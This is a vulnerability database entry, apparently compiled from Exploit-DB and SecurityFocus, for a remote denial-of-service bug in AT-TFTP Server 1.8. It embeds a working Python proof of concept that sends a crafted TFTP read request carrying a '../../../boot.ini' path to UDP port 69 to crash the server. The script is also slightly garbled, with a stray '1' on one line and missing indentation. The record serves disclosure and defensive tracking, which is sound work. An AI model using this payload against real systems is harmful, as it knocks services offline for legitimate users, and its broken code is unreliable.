ID

VAR-E-201104-0170


EDB ID

35654


TITLE

AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service - Windows dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 35654

DESCRIPTION

AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service.. dos exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 35654

AFFECTED PRODUCTS

vendor:at tftpmodel:serverscope:eqversion:1.8

Trust: 1.6

vendor:alliedmodel:telesis at-tftp serverscope:eqversion:1.8

Trust: 0.3

sources: BID: 47561 // EXPLOIT-DB: 35654 // EDBNET: 56814

EXPLOIT

source: https://www.securityfocus.com/bid/47561/info

AT-TFTP is prone to a remote denial-of-service vulnerability.

Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.

AT-TFTP 1.8 is affected; other versions may also be vulnerable.

#!/usr/bin/python

##############################################################################
# Exploit : http://secpod.org/blog/?p=XXXXXXXXXXXXXXXXXXXXXXXXX
# http://secpod.org/wintftp_dos_poc.py
# Reference :
# Author : Antu Sanadi from SecPod Technologies (www.secpod.com)
#
# Exploit will crash AT-TFTP Server v1.8 Service
# Tested against AT-TFTP Server v1.8 server
##############################################################################

import socket
import sys

host = '127.0.0.1'
port = 69

try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)

addr = (host,port)1

data ='\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\
'\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00'
s.sendto(data, (host, port))

Trust: 1.0

sources: EXPLOIT-DB: 35654

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 35654

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 35654

TYPE

'Read' Request Remote Denial of Service

Trust: 1.0

sources: EXPLOIT-DB: 35654

CREDITS

Antu Sanadi

Trust: 0.6

sources: EXPLOIT-DB: 35654

EXTERNAL IDS

db:EXPLOIT-DBid:35654

Trust: 1.9

db:BIDid:47561

Trust: 1.9

db:EDBNETid:56814

Trust: 0.6

sources: BID: 47561 // EXPLOIT-DB: 35654 // EDBNET: 56814

REFERENCES

url:https://www.securityfocus.com/bid/47561/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/35654/

Trust: 0.6

url:http://www.alliedtelesyn.co.uk/en-gb/support/downloads/tools.asp

Trust: 0.3

url:https://www.exploit-db.com/exploits/35654

Trust: 0.3

sources: BID: 47561 // EXPLOIT-DB: 35654 // EDBNET: 56814

SOURCES

db:BIDid:47561
db:EXPLOIT-DBid:35654
db:EDBNETid:56814

LAST UPDATE DATE

2022-07-27T09:59:09.577000+00:00


SOURCES UPDATE DATE

db:BIDid:47561date:2011-04-25T00:00:00

SOURCES RELEASE DATE

db:BIDid:47561date:2011-04-25T00:00:00
db:EXPLOIT-DBid:35654date:2011-04-25T00:00:00
db:EDBNETid:56814date:2011-04-25T00:00:00